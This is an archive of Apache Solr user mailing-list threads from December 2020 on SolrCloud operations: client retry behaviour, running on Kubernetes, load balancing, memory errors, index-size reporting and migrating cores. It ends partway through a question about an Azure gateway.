> 
> Regards,
> kshitij
> 
> 
> 
> 
> 
> On Fri, Dec 18, 2020 at 7:12 PM Erick Erickson 
> wrote:
> 
>> Why do you want to do this? This sounds like an XY problem, you
>> think you’re going to solve some problem X by doing Y. Y in this case
>> is setting the numServersToTry, but you haven’t explained what X,
>> the problem you’re trying to solve is.
>> 
>> Offhand, this seems like a terrible idea. If you’re requests are timing
>> out, what purpose is served by _not_ trying the next one on the
>> list? With, of course, a much longer timeout interval…
>> 
>> The code is structured that way on the theory that you want the request
>> to succeed and the system needs to be tolerant of momentary
>> glitches due to network congestion, reading indexes into memory, etc.
>> Bypassing that assumption needs some justification….
>> 
>> Best,
>> Erick
>> 
>>> On Dec 18, 2020, at 6:23 AM, kshitij tyagi 
>> wrote:
>>> 
>>> Hi,
>>> 
>>> We have a Solrcloud setup and are using CloudSolrClient, What we are
>> seeing
>>> is if socketTimeoutOccurs then the same request is sent to other solr
>>> server.
>>> 
>>> So if I set socketTimeout to a very low value say 100ms and my query
>> takes
>>> around 200ms then client tries to query second server, then next and so
>>> on(basically all available servers with same query).
>>> 
>>> I see that we have *numServersToTry* in LBSolrClient class but not able
>> to
>>> set this using CloudSolrClient. Using this we can restrict the above
>>> feature.
>>> 
>>> Should a jira be created to support numServersToTry by CloudSolrClient?
>> Or
>>> is there any other way to control the request to other solr servers?.
>>> 
>>> Regards,
>>> kshitij
>> 
>> 



Re: solrCloud client socketTimeout initiates retries

2020-12-18 Thread kshitij tyagi
Hi Erick,

I agree but in a huge cluster the retries keeps on happening, cant we have
this feature implemented in client.
 i was referring to this jira
https://issues.apache.org/jira/browse/SOLR-10479
We have seen that some malicious queries come to system which takes
significant time and these queries propagating to other solr servers choke
the entire cluster.

Regards,
kshitij





On Fri, Dec 18, 2020 at 7:12 PM Erick Erickson 
wrote:

> Why do you want to do this? This sounds like an XY problem, you
> think you’re going to solve some problem X by doing Y. Y in this case
> is setting the numServersToTry, but you haven’t explained what X,
> the problem you’re trying to solve is.
>
> Offhand, this seems like a terrible idea. If you’re requests are timing
> out, what purpose is served by _not_ trying the next one on the
> list? With, of course, a much longer timeout interval…
>
> The code is structured that way on the theory that you want the request
> to succeed and the system needs to be tolerant of momentary
> glitches due to network congestion, reading indexes into memory, etc.
> Bypassing that assumption needs some justification….
>
> Best,
> Erick
>
> > On Dec 18, 2020, at 6:23 AM, kshitij tyagi 
> wrote:
> >
> > Hi,
> >
> > We have a Solrcloud setup and are using CloudSolrClient, What we are
> seeing
> > is if socketTimeoutOccurs then the same request is sent to other solr
> > server.
> >
> > So if I set socketTimeout to a very low value say 100ms and my query
> takes
> > around 200ms then client tries to query second server, then next and so
> > on(basically all available servers with same query).
> >
> > I see that we have *numServersToTry* in LBSolrClient class but not able
> to
> > set this using CloudSolrClient. Using this we can restrict the above
> > feature.
> >
> > Should a jira be created to support numServersToTry by CloudSolrClient?
> Or
> > is there any other way to control the request to other solr servers?.
> >
> > Regards,
> > kshitij
>
>


Re: solrCloud client socketTimeout initiates retries

2020-12-18 Thread Erick Erickson
Why do you want to do this? This sounds like an XY problem, you
think you’re going to solve some problem X by doing Y. Y in this case
is setting the numServersToTry, but you haven’t explained what X,
the problem you’re trying to solve is.

Offhand, this seems like a terrible idea. If you’re requests are timing
out, what purpose is served by _not_ trying the next one on the
list? With, of course, a much longer timeout interval…

The code is structured that way on the theory that you want the request
to succeed and the system needs to be tolerant of momentary
glitches due to network congestion, reading indexes into memory, etc.
Bypassing that assumption needs some justification….

Best,
Erick

> On Dec 18, 2020, at 6:23 AM, kshitij tyagi  wrote:
> 
> Hi,
> 
> We have a Solrcloud setup and are using CloudSolrClient, What we are seeing
> is if socketTimeoutOccurs then the same request is sent to other solr
> server.
> 
> So if I set socketTimeout to a very low value say 100ms and my query takes
> around 200ms then client tries to query second server, then next and so
> on(basically all available servers with same query).
> 
> I see that we have *numServersToTry* in LBSolrClient class but not able to
> set this using CloudSolrClient. Using this we can restrict the above
> feature.
> 
> Should a jira be created to support numServersToTry by CloudSolrClient? Or
> is there any other way to control the request to other solr servers?.
> 
> Regards,
> kshitij



solrCloud client socketTimeout initiates retries

2020-12-18 Thread kshitij tyagi
Hi,

We have a Solrcloud setup and are using CloudSolrClient, What we are seeing
is if socketTimeoutOccurs then the same request is sent to other solr
server.

So if I set socketTimeout to a very low value say 100ms and my query takes
around 200ms then client tries to query second server, then next and so
on(basically all available servers with same query).

I see that we have *numServersToTry* in LBSolrClient class but not able to
set this using CloudSolrClient. Using this we can restrict the above
feature.

Should a jira be created to support numServersToTry by CloudSolrClient? Or
is there any other way to control the request to other solr servers?.

Regards,
kshitij


Re: solrcloud with EKS kubernetes

2020-12-16 Thread Jonathan Tan
Hi Abhishek,

We're running Solr Cloud 8.6 on GKE.
3 node cluster, running 4 cpus (configured) and 8gb of min & max JVM
configured, all with anti-affinity so they never exist on the same node.
It's got 2 collections of ~13documents each, 6 shards, 3 replicas each,
disk usage on each node is ~54gb (we've got all the shards replicated to
all nodes)

We're also using a 200gb zonal SSD, which *has* been necessary just so that
we've got the right IOPS & bandwidth. (That's approximately 6000 IOPS for
read & write each, and 96MB/s for read & write each)

Various lessons learnt...
You definitely don't want them ever on the same kubernetes node. From a
resilience perspective, yes, but also when one SOLR node gets busy, they
tend to all get busy, so now you'll have resource contention. Recovery can
also get very busy and resource intensive, and again, sitting on the same
node is problematic. We also saw the need to move to SSDs because of how
IOPS bound we were.

Did I mention use SSDs? ;)

Good luck!

On Mon, Dec 14, 2020 at 5:34 PM Abhishek Mishra 
wrote:

> Hi Houston,
> Sorry for the late reply. Each shard has a 9GB size around.
> Yeah, we are providing enough resources to pods. We are currently
> using c5.4xlarge.
> XMS and XMX is 16GB. The machine is having 32 GB and 16 core.
> No, I haven't run it outside Kubernetes. But I do have colleagues who did
> the same on 7.2 and didn't face any issue regarding it.
> Storage volume is gp2 50GB.
> It's not the search query where we are facing inconsistencies or timeouts.
> Seems some internal admin APIs sometimes have issues. So while adding new
> replica in clusters sometimes result in inconsistencies. Like recovery
> takes some time more than one hour.
>
> Regards,
> Abhishek
>
> On Thu, Dec 10, 2020 at 10:23 AM Houston Putman 
> wrote:
>
> > Hello Abhishek,
> >
> > It's really hard to provide any advice without knowing any information
> > about your setup/usage.
> >
> > Are you giving your Solr pods enough resources on EKS?
> > Have you run Solr in the same configuration outside of kubernetes in the
> > past without timeouts?
> > What type of storage volumes are you using to store your data?
> > Are you using headless services to connect your Solr Nodes, or ingresses?
> >
> > If this is the first time that you are using this data + Solr
> > configuration, maybe it's just that your data within Solr isn't optimized
> > for the type of queries that you are doing.
> > If you have run it successfully in the past outside of Kubernetes, then I
> > would look at the resources that you are giving your pods and the storage
> > volumes that you are using.
> > If you are using Ingresses, that might be causing slow connections
> between
> > nodes, or between your client and Solr.
> >
> > - Houston
> >
> > On Wed, Dec 9, 2020 at 3:24 PM Abhishek Mishra 
> > wrote:
> >
> > > Hello guys,
> > > We are kind of facing some of the issues(Like timeout etc.) which are
> > very
> > > inconsistent. By any chance can it be related to EKS? We are using solr
> > 7.7
> > > and zookeeper 3.4.13. Should we move to ECS?
> > >
> > > Regards,
> > > Abhishek
> > >
> >
>


Re: Solrcloud load balancing / failover

2020-12-14 Thread Shalin Shekhar Mangar
No, the load balancing is based on random selection of replicas and
CPU is not consulted. There are limited ways to influence the replica
selection, see 
https://lucene.apache.org/solr/guide/8_4/distributed-requests.html#shards-preference-parameter

If a replica fails then the query fails and an error is returned. I
think (but I am not sure) that SolrJ retries the request on some
specific errors in which case a different replica may be selected and
the request may succeed.

IMO, these are two weak areas of Solr right now. Suggestions/patches
are welcome :-)

On 12/11/20, Dominique Bejean  wrote:
> Hi,
>
> Is there in Solrcloud any load balancing based on CPU load on Solr nodes ?
>
> If for shard a replica fails to handle a query, the query is sent to
> another replica in order to be completed ?
>
> Regards
>
> Dominique
>


-- 
Regards,
Shalin Shekhar Mangar.


Re: solrcloud with EKS kubernetes

2020-12-14 Thread Shalin Shekhar Mangar
FWIW, I have seen Solr exhaust the IOPS burst quota on AWS causing
slow replication and high latency for search and indexing operations.
You may want to dig into cloud watch metrics and see if you are
running into a similar issue. The default IOPS quota on gp2 is very
low (100?).

Another thing to check is whether you have DNS TTLs for both positive
and negative lookups configured. When nodes go down and come back up
in Kubernetes the address of the pod remains the same but the IP can
change and the JVM caches DNS lookups. This can cause timeouts.

On 12/14/20, Abhishek Mishra  wrote:
> Hi Houston,
> Sorry for the late reply. Each shard has a 9GB size around.
> Yeah, we are providing enough resources to pods. We are currently
> using c5.4xlarge.
> XMS and XMX is 16GB. The machine is having 32 GB and 16 core.
> No, I haven't run it outside Kubernetes. But I do have colleagues who did
> the same on 7.2 and didn't face any issue regarding it.
> Storage volume is gp2 50GB.
> It's not the search query where we are facing inconsistencies or timeouts.
> Seems some internal admin APIs sometimes have issues. So while adding new
> replica in clusters sometimes result in inconsistencies. Like recovery
> takes some time more than one hour.
>
> Regards,
> Abhishek
>
> On Thu, Dec 10, 2020 at 10:23 AM Houston Putman 
> wrote:
>
>> Hello Abhishek,
>>
>> It's really hard to provide any advice without knowing any information
>> about your setup/usage.
>>
>> Are you giving your Solr pods enough resources on EKS?
>> Have you run Solr in the same configuration outside of kubernetes in the
>> past without timeouts?
>> What type of storage volumes are you using to store your data?
>> Are you using headless services to connect your Solr Nodes, or ingresses?
>>
>> If this is the first time that you are using this data + Solr
>> configuration, maybe it's just that your data within Solr isn't optimized
>> for the type of queries that you are doing.
>> If you have run it successfully in the past outside of Kubernetes, then I
>> would look at the resources that you are giving your pods and the storage
>> volumes that you are using.
>> If you are using Ingresses, that might be causing slow connections
>> between
>> nodes, or between your client and Solr.
>>
>> - Houston
>>
>> On Wed, Dec 9, 2020 at 3:24 PM Abhishek Mishra 
>> wrote:
>>
>> > Hello guys,
>> > We are kind of facing some of the issues(Like timeout etc.) which are
>> very
>> > inconsistent. By any chance can it be related to EKS? We are using solr
>> 7.7
>> > and zookeeper 3.4.13. Should we move to ECS?
>> >
>> > Regards,
>> > Abhishek
>> >
>>
>


-- 
Regards,
Shalin Shekhar Mangar.


Re: solrcloud with EKS kubernetes

2020-12-13 Thread Abhishek Mishra
Hi Houston,
Sorry for the late reply. Each shard has a 9GB size around.
Yeah, we are providing enough resources to pods. We are currently
using c5.4xlarge.
XMS and XMX is 16GB. The machine is having 32 GB and 16 core.
No, I haven't run it outside Kubernetes. But I do have colleagues who did
the same on 7.2 and didn't face any issue regarding it.
Storage volume is gp2 50GB.
It's not the search query where we are facing inconsistencies or timeouts.
Seems some internal admin APIs sometimes have issues. So while adding new
replica in clusters sometimes result in inconsistencies. Like recovery
takes some time more than one hour.

Regards,
Abhishek

On Thu, Dec 10, 2020 at 10:23 AM Houston Putman 
wrote:

> Hello Abhishek,
>
> It's really hard to provide any advice without knowing any information
> about your setup/usage.
>
> Are you giving your Solr pods enough resources on EKS?
> Have you run Solr in the same configuration outside of kubernetes in the
> past without timeouts?
> What type of storage volumes are you using to store your data?
> Are you using headless services to connect your Solr Nodes, or ingresses?
>
> If this is the first time that you are using this data + Solr
> configuration, maybe it's just that your data within Solr isn't optimized
> for the type of queries that you are doing.
> If you have run it successfully in the past outside of Kubernetes, then I
> would look at the resources that you are giving your pods and the storage
> volumes that you are using.
> If you are using Ingresses, that might be causing slow connections between
> nodes, or between your client and Solr.
>
> - Houston
>
> On Wed, Dec 9, 2020 at 3:24 PM Abhishek Mishra 
> wrote:
>
> > Hello guys,
> > We are kind of facing some of the issues(Like timeout etc.) which are
> very
> > inconsistent. By any chance can it be related to EKS? We are using solr
> 7.7
> > and zookeeper 3.4.13. Should we move to ECS?
> >
> > Regards,
> > Abhishek
> >
>


Solrcloud load balancing / failover

2020-12-11 Thread Dominique Bejean
Hi,

Is there in Solrcloud any load balancing based on CPU load on Solr nodes ?

If for shard a replica fails to handle a query, the query is sent to
another replica in order to be completed ?

Regards

Dominique


Re: SolrCloud crashing due to memory error - 'Cannot allocate memory' (errno=12)

2020-12-10 Thread Walter Underwood
How much RAM do you have on those machines? That message says you ran out.

32 GB is a HUGE heap. Unless you have a specific need for that, run with a 8 GB
heap and see how that works. 

wunder
Walter Underwood
wun...@wunderwood.org
http://observer.wunderwood.org/  (my blog)

> On Dec 10, 2020, at 7:55 PM, Altamirano, Emmanuel 
>  wrote:
> 
> Hello,
>  
> We have a SolrCloud(8.6) with 3 servers with the same characteristics and 
> configuration. We assigned32GB for heap memory each, and after some short 
> period of time sending 40 concurrent requests to the SolrCloud using a load 
> balancer, we are getting the following error that shutdown each Solr Server 
> and Zookeeper:
>  
> OpenJDK 64-Bit Server VM warning: Failed to reserve large pages memory 
> req_addr: 0x bytes: 536870912 (errno = 12).
> OpenJDK 64-Bit Server VM warning: Attempt to deallocate stack guard pages 
> failed.
> OpenJDK 64-Bit Server VM warning: INFO: os::commit_memory(0x7edd4d9da000, 
> 12288, 0) failed; error='Cannot allocate memory' (errno=12)
>  
>  
> 20201201 10:43:29.495 [ERROR] {qtp2051853139-23369} [c:express s:shard1 
> r:core_node6 x:express_shard1_replica_n4] 
> [org.apache.solr.handler.RequestHandlerBase, 148] | 
> org.apache.solr.common.SolrException: Cannot talk to ZooKeeper - Updates are 
> disabled.
> at 
> org.apache.solr.update.processor.DistributedZkUpdateProcessor.zkCheck(DistributedZkUpdateProcessor.java:1245)
> at 
> org.apache.solr.update.processor.DistributedZkUpdateProcessor.setupRequest(DistributedZkUpdateProcessor.java:582)
> at 
> org.apache.solr.update.processor.DistributedZkUpdateProcessor.processAdd(DistributedZkUpdateProcessor.java:239)
>  
> 
>  
> We have a one collection with one shard, almost 400 million documents 
> (~334GB).
>  
> $ sysctl vm.nr_hugepages
> vm.nr_hugepages = 32768
> $ sysctl vm.max_map_count
> vm.max_map_count = 131072
>  
> /etc/security/limits.conf
>  
> * - core unlimited
> * - data unlimited
> * - priority unlimited
> * - fsize unlimited
> * - sigpending 513928
> * - memlock unlimited
> * - nofile 131072
> * - msgqueue 819200
> * - rtprio 0
> * - stack 8192
> * - cpu unlimited
> * - rss unlimited #virtual memory unlimited
> * - locks unlimited
> * soft nproc 65536
> * hard nproc 65536
> * - nofile 131072
>  
>  
>  
> /etc/sysctl.conf
>  
> vm.nr_hugepages =  32768
> vm.max_map_count = 131072
>  
>  
> Could you please provide me some advice to fix this error?
>  
> Thanks,
>  
> Emmanuel Altamirano



SolrCloud crashing due to memory error - 'Cannot allocate memory' (errno=12)

2020-12-10 Thread Altamirano, Emmanuel
Hello,

We have a SolrCloud(8.6) with 3 servers with the same characteristics and 
configuration. We assigned 32GB for heap memory each, and after some short 
period of time sending 40 concurrent requests to the SolrCloud using a load 
balancer, we are getting the following error that shutdown each Solr Server and 
Zookeeper:

OpenJDK 64-Bit Server VM warning: Failed to reserve large pages memory 
req_addr: 0x bytes: 536870912 (errno = 12).
OpenJDK 64-Bit Server VM warning: Attempt to deallocate stack guard pages 
failed.
OpenJDK 64-Bit Server VM warning: INFO: os::commit_memory(0x7edd4d9da000, 
12288, 0) failed; error='Cannot allocate memory' (errno=12)


20201201 10:43:29.495 [ERROR] {qtp2051853139-23369} [c:express s:shard1 
r:core_node6 x:express_shard1_replica_n4] 
[org.apache.solr.handler.RequestHandlerBase, 148] | 
org.apache.solr.common.SolrException: Cannot talk to ZooKeeper - Updates are 
disabled.
at 
org.apache.solr.update.processor.DistributedZkUpdateProcessor.zkCheck(DistributedZkUpdateProcessor.java:1245)
at 
org.apache.solr.update.processor.DistributedZkUpdateProcessor.setupRequest(DistributedZkUpdateProcessor.java:582)
at 
org.apache.solr.update.processor.DistributedZkUpdateProcessor.processAdd(DistributedZkUpdateProcessor.java:239)

[cid:image004.jpg@01D6CF3F.27574B90]

We have a one collection with one shard, almost 400 million documents (~334GB).

$ sysctl vm.nr_hugepages
vm.nr_hugepages = 32768
$ sysctl vm.max_map_count
vm.max_map_count = 131072

/etc/security/limits.conf

* - core unlimited
* - data unlimited
* - priority unlimited
* - fsize unlimited
* - sigpending 513928
* - memlock unlimited
* - nofile 131072
* - msgqueue 819200
* - rtprio 0
* - stack 8192
* - cpu unlimited
* - rss unlimited #virtual memory unlimited
* - locks unlimited
* soft nproc 65536
* hard nproc 65536
* - nofile 131072



/etc/sysctl.conf

vm.nr_hugepages =  32768
vm.max_map_count = 131072


Could you please provide me some advice to fix this error?

Thanks,

Emmanuel Altamirano


Re: solrcloud with EKS kubernetes

2020-12-09 Thread Houston Putman
Hello Abhishek,

It's really hard to provide any advice without knowing any information
about your setup/usage.

Are you giving your Solr pods enough resources on EKS?
Have you run Solr in the same configuration outside of kubernetes in the
past without timeouts?
What type of storage volumes are you using to store your data?
Are you using headless services to connect your Solr Nodes, or ingresses?

If this is the first time that you are using this data + Solr
configuration, maybe it's just that your data within Solr isn't optimized
for the type of queries that you are doing.
If you have run it successfully in the past outside of Kubernetes, then I
would look at the resources that you are giving your pods and the storage
volumes that you are using.
If you are using Ingresses, that might be causing slow connections between
nodes, or between your client and Solr.

- Houston

On Wed, Dec 9, 2020 at 3:24 PM Abhishek Mishra  wrote:

> Hello guys,
> We are kind of facing some of the issues(Like timeout etc.) which are very
> inconsistent. By any chance can it be related to EKS? We are using solr 7.7
> and zookeeper 3.4.13. Should we move to ECS?
>
> Regards,
> Abhishek
>


How can i poll Solrcloud via API to get the sum of index size of all shards and replicas?

2020-12-09 Thread Roman Ivanov
Hello! We have a Solrcloud(7.4) consisting of 90+ hosts(each of them
running multiple nodes of solr, e.g. ports 8983, 8984, 8985), numerous
shards(each having several replicas) and numerous collections.

I was given a task to summarize the total index size(on disks) of a certain
collection. First I calculated it from web interface(via copy-paste)
manually and there were thousands of lines (The http interface(8983) Cloud
- Nodes tab). It took about several hours. Now i consider this task needs
some automatization. I read the API documentation and googled but still no
luck... And any possible solution could help somebody else in the future.

What i tried:
   1) If I poll one of the solr cores via

"
http://solrhost1.somecorporatesite.org:8983/solr/admin/metrics?wt=JSON=INDEX
"

I get output like (**cores.json**):

"responseHeader":{
   "status":0,
"Qtime":2004},
 "metrics":{
   "solr.core.collectionname1-2020-12-05.shard12.replica_n240:{
   "INDEX.size":"456 bytes",
   "INDEX.sizeInBytes":456},
   "solr.core.collectionname2-2020-12-04.shard74.replica_n650:{
   "INDEX.size":"2.88 GB",
   "INDEX.sizeInBytes":3088933801},

... and so on which is what i need BUT only according to one core(local).
But there are more than 200 of them.

   2) I can get a list of all collections, shards and replicas via:


http://localhost:8983/solr/admin/collections?action=clusterstatus=json

and it looks like (**collections.json**)

"responseHeader":{
  "status":0,
  "QTime":184},
"cluster":{
  "collections":{
  "collectionname1":{
  "pullReplicas":"0",
  "replicationFactor":"1",
  "shards":{
 "shard1":{
  "range":"8-80e0",
  "state":active",
  "replicas":{
 "core_node67":{
   "core":"collectionname123-2020-11-30_shard1_replica_n54",
   "node_name":"solrhost99.somecorporatesite.org:8985/solr",
   "state":"active",
   "type":"NRT",
   "force_ste_state":"false",
   "leader":"true"},
  "core_node548":{
 "core":"collectionname223-2020-11-29_shard1_replica_n448",
  "node_name":"solrhost77.somecorporatesite.org:8984/solr",
  "state":"active",
  "type":"NRT",
  "force_ste_state":"false"}}},
   "shard2":{
 "range":

... and so on, 117 156 lines

The question is, how can i insert the fields of INDEX.size into the second
output(clusterstatus) for calculation of sum disk space used by indices?

In other words, i need the correspondings fields of INDEX.size in replicas
sections of **collections.json**

Currently the whole solr system consumes 100TB+ and is still growing, we
need to know the tempo of it's growth. Many thanks in advance!


solrcloud with EKS kubernetes

2020-12-08 Thread Abhishek Mishra
Hello guys,
We are kind of facing some of the issues(Like timeout etc.) which are very
inconsistent. By any chance can it be related to EKS? We are using solr 7.7
and zookeeper 3.4.13. Should we move to ECS?

Regards,
Abhishek


Re: SolrCloud shows cluster still healthy even the node data directory is deleted

2020-12-06 Thread Amy Bai
Hi community,

I create a Solr Jira to track this issue.
https://issues.apache.org/jira/browse/SOLR-15028


Regards,
Amy

From: Radar Lei 
Sent: Friday, November 20, 2020 5:13 PM
To: solr-user@lucene.apache.org 
Subject: Re: SolrCloud shows cluster still healthy even the node data directory 
is deleted

Hi Erick,

I understand this is how the file handler works.

But for the SolrCloud users, they didn't see the expected replica failover 
happens, then we can not say SolrCloud is totally HA enabled. Do we have plan 
to handle the HA for disk failures? Thanks.

Regards,
Radar

From: Amy Bai 
Date: Wednesday, November 11, 2020 at 8:19 PM
To: solr-user@lucene.apache.org 
Subject: Re: SolrCloud shows cluster still healthy even the node data directory 
is deleted
Hi Erick,

Thanks for your kindly reply.
There are two things that confuse me:

1. index/search queries keep failing because one of the node data directory is 
gone, but the node is not marked as down.

2. The replicas on the failed node are not working, but the Index/search 
queries didn't failover to other healthy replicas.

Regards,
Amy

From: Erick Erickson 
Sent: Monday, November 9, 2020 8:43 PM
To: solr-user@lucene.apache.org 
Subject: Re: SolrCloud shows cluster still healthy even the node data directory 
is deleted

Depends. *nix systems have delete-on-close semantics, that is as
long as there’s a single file handle open, the file will be still be
available to the process using it. Only when the last file handle is
closed will the file actually be deleted.

Solr (Lucene actually) has  file handle open to every file in the index
all the time.

These files aren’t visible when you do a directory listing. So if you
stop Solr, are the files gone? NOTE: When you start Solr again, if
there are existing replicas that are healthy then the entire index
should be copied from another replica….

Best,
Erick

> On Nov 9, 2020, at 3:30 AM, Amy Bai  wrote:
>
> Hi community,
>
> I found that SolrCloud won't check the IO status if the SolrCloud process is 
> alive.
> E.g. If I delete the SolrCloud data directory, there are no errors report, 
> and I can still log in to the SolrCloud   Admin UI to create/query 
> collections.
> Is this reasonable?
> Can someone explain why SOLR handles it like this?
> Thanks so much.
>
>
> Regards,
> Amy


Re: Migrate Legacy Solr Cores to SolrCloud

2020-12-05 Thread Erick Erickson
First thing I’d do is run one of the examples to insure you have Zookeeper set 
up etc. You can create a collection that uses the default configset.

Once that’s done, start with ‘SOLR_HOME/solr/bin/solr zk upconfig’. There’s 
extensive help if you just type “bin/solr zk -help”. You give it the path to an 
existing config directory and a name for the configset in Zookeeper.

Once that’s done, you can create the collection, the admin UI drop-down will 
allow you to choose the configset. Now you have a collection.

To put data in that collection, it would be best to index the data again. If 
you can’t do that, you MUST have created the collection with exactly one shard, 
replicationFactor=1 (leader-only). Shut down Solr and copy your core’s data 
directory (the parent of the index directory) to “the right place”. You’ll 
overwrite an existing data directory with a name like 
collection1_shard1_replica_n1/data. Do _not_ copy the entire core directory up, 
_just_ recursively copy the “data” dir.

Now power Solr back up and you should be good. You can use the collections API 
ADDREPLICA command to build out your collection for HA/DR.

NOTE: if by “existing” you mean an index created with Solr X-2 (i.e. Solr 6 or 
earlier and assuming you’re migrating to Solr 8) this will not work and you’ll 
have to re-index your data. This is not particular to SolrCloud, Lucene will 
refuse to open the index if it was created with any version of Solr earlier 
than the immediately prior major Solr release, i.e. if the index was _created_ 
with Solr 7, you can do the above if you’re moving to Solr 8. If you’re 
migrating to Solr 7, then if the old index was created with Solr 6 you’ll be 
ok….

Best,
Erick

> On Dec 4, 2020, at 3:07 PM, Jay Mandal  
> wrote:
> 
> Hello All,
> Please can some one from the Solr Lucene Community Provide me the Steps on 
> how to migrate an existing Solr legacy Core, data and conf(manage 
> schema,solrconfig.xml files to SolrCloud configuration with collections and 
> shards and where to copy the existing files to reuse the data in the solr 
> knowledgebase.
> Thanks,
> Jayanta.
> 
> Regards,
> 
> Jayanta Mandal
> 4500 S Lakeshore Dr #620, Tempe, AZ 85282
> +1.602-900-1791 ext. 10134|Direct: +1.718-316-0384
> www.anjusoftware.com<http://www.anjusoftware.com>
> 
> 
> 
> 
> 
> Confidentiality Notice
> 
> This email message, including any attachments, is for the sole use of the 
> intended recipient and may contain confidential and privileged information. 
> Any unauthorized view, use, disclosure or distribution is prohibited. If you 
> are not the intended recipient, please contact the sender by reply email and 
> destroy all copies of the original message. Anju Software, Inc. 4500 S. 
> Lakeshore Drive, Suite 620, Tempe, AZ USA 85282.



Migrate Legacy Solr Cores to SolrCloud

2020-12-05 Thread Jay Mandal
Hello All,
Please can some one from the Solr Lucene Community Provide me the Steps on how 
to migrate an existing Solr legacy Core, data and conf(manage 
schema,solrconfig.xml files to SolrCloud configuration with collections and 
shards and where to copy the existing files to reuse the data in the solr 
knowledgebase.
Thanks,
Jayanta.

Regards,

Jayanta Mandal
4500 S Lakeshore Dr #620, Tempe, AZ 85282
+1.602-900-1791 ext. 10134|Direct: +1.718-316-0384
www.anjusoftware.com<http://www.anjusoftware.com>





Confidentiality Notice

This email message, including any attachments, is for the sole use of the 
intended recipient and may contain confidential and privileged information. Any 
unauthorized view, use, disclosure or distribution is prohibited. If you are 
not the intended recipient, please contact the sender by reply email and 
destroy all copies of the original message. Anju Software, Inc. 4500 S. 
Lakeshore Drive, Suite 620, Tempe, AZ USA 85282.


Re: SolrCloud shows cluster still healthy even the node data directory is deleted

2020-11-20 Thread Radar Lei
Hi Erick,

I understand this is how the file handler works.

But for the SolrCloud users, they didn't see the expected replica failover 
happens, then we can not say SolrCloud is totally HA enabled. Do we have plan 
to handle the HA for disk failures? Thanks.

Regards,
Radar

From: Amy Bai 
Date: Wednesday, November 11, 2020 at 8:19 PM
To: solr-user@lucene.apache.org 
Subject: Re: SolrCloud shows cluster still healthy even the node data directory 
is deleted
Hi Erick,

Thanks for your kindly reply.
There are two things that confuse me:

1. index/search queries keep failing because one of the node data directory is 
gone, but the node is not marked as down.

2. The replicas on the failed node are not working, but the Index/search 
queries didn't failover to other healthy replicas.

Regards,
Amy

From: Erick Erickson 
Sent: Monday, November 9, 2020 8:43 PM
To: solr-user@lucene.apache.org 
Subject: Re: SolrCloud shows cluster still healthy even the node data directory 
is deleted

Depends. *nix systems have delete-on-close semantics, that is as
long as there’s a single file handle open, the file will be still be
available to the process using it. Only when the last file handle is
closed will the file actually be deleted.

Solr (Lucene actually) has  file handle open to every file in the index
all the time.

These files aren’t visible when you do a directory listing. So if you
stop Solr, are the files gone? NOTE: When you start Solr again, if
there are existing replicas that are healthy then the entire index
should be copied from another replica….

Best,
Erick

> On Nov 9, 2020, at 3:30 AM, Amy Bai  wrote:
>
> Hi community,
>
> I found that SolrCloud won't check the IO status if the SolrCloud process is 
> alive.
> E.g. If I delete the SolrCloud data directory, there are no errors report, 
> and I can still log in to the SolrCloud   Admin UI to create/query 
> collections.
> Is this reasonable?
> Can someone explain why SOLR handles it like this?
> Thanks so much.
>
>
> Regards,
> Amy


Re: Unloading and loading a Collection in SolrCloud with external Zookeeper ensemble

2020-11-15 Thread Gajanan
Thanks for the replies. Wanted to make sure that I am not missing on
something already available. Now that everything is clear, I may have to go
for application re-design or choose an approach, not so elegant, as
suggested.
Thanks all.
-Gajanan 



--
Sent from: https://lucene.472066.n3.nabble.com/Solr-User-f472068.html


Re: Unloading and loading a Collection in SolrCloud with external Zookeeper ensemble

2020-11-15 Thread Ilan Ginzburg
An unelegant alternative is to back up and delete a collection in lieu of
unload, restore it in lieu of load...

Ilan

On Sun, Nov 15, 2020 at 6:56 PM Erick Erickson 
wrote:

> I don’t really have any good alternatives. There’s an open JIRA for
> this, see: SOLR-6399
>
> This would be a pretty big chunk of work, which is one of the reasons
> this JIRA has languished…
>
> Sorry I can’t be more helpful,
> Erick
>
> > On Nov 15, 2020, at 11:00 AM, Gajanan  wrote:
> >
> > Hi Erick, thanks for the reply.
> > I am working on a application where a  solr collection is being created
> per
> > usage of application accumulating lot of them over period of time . In
> order
> > to keep memory requirements under control, I am unloading collections
> not in
> > current usage and loading them whenever required.
> > This was working in non cloud mode with coreAdmin APIs. Now because of
> > scaling requirements we want to shift to SolrCloud mode. we want to
> continue
> > with same application design. can you suggest, how to implement a similar
> > solution in SolrCloud context.
> >
> > -Gajanan
> >
> >
> >
> > --
> > Sent from: https://lucene.472066.n3.nabble.com/Solr-User-f472068.html
>
>


Re: Unloading and loading a Collection in SolrCloud with external Zookeeper ensemble

2020-11-15 Thread Erick Erickson
I don’t really have any good alternatives. There’s an open JIRA for
this, see: SOLR-6399

This would be a pretty big chunk of work, which is one of the reasons
this JIRA has languished…

Sorry I can’t be more helpful,
Erick

> On Nov 15, 2020, at 11:00 AM, Gajanan  wrote:
> 
> Hi Erick, thanks for the reply.
> I am working on a application where a  solr collection is being created per
> usage of application accumulating lot of them over period of time . In order
> to keep memory requirements under control, I am unloading collections not in
> current usage and loading them whenever required. 
> This was working in non cloud mode with coreAdmin APIs. Now because of
> scaling requirements we want to shift to SolrCloud mode. we want to continue
> with same application design. can you suggest, how to implement a similar
> solution in SolrCloud context.
> 
> -Gajanan
> 
> 
> 
> --
> Sent from: https://lucene.472066.n3.nabble.com/Solr-User-f472068.html



Re: Unloading and loading a Collection in SolrCloud with external Zookeeper ensemble

2020-11-15 Thread Gajanan
Hi Erick, thanks for the reply.
I am working on a application where a  solr collection is being created per
usage of application accumulating lot of them over period of time . In order
to keep memory requirements under control, I am unloading collections not in
current usage and loading them whenever required. 
This was working in non cloud mode with coreAdmin APIs. Now because of
scaling requirements we want to shift to SolrCloud mode. we want to continue
with same application design. can you suggest, how to implement a similar
solution in SolrCloud context.

-Gajanan



--
Sent from: https://lucene.472066.n3.nabble.com/Solr-User-f472068.html


Setting up SolrCloud Behind Azure Application Gateway

2020-11-12 Thread Victor Kretzer
I'm attempting to set up SolrCloud for use with Sitecore 9.0.2. I want to set 
up my Azure Application Gateway with a TSL cert. I want a private IP for 
Sitecore and a public IP for accessing the Solr Admin Dashboard. My goal is to 
use Application Gateway for the TSL and then route to the backend using http 
protocol.

I currently have the following configuration:
* 2 SolrCloud 6.6.6 nodes on 2 Azure Ubuntu 18.04 
LTS VMs
* 3 Zookeeper nodes on 3 Azure Ubuntu VMs
* A VPN with the IPs of all the above
* An application Gateway with:
o public listener on port 443
o public listener on port 80 (to 
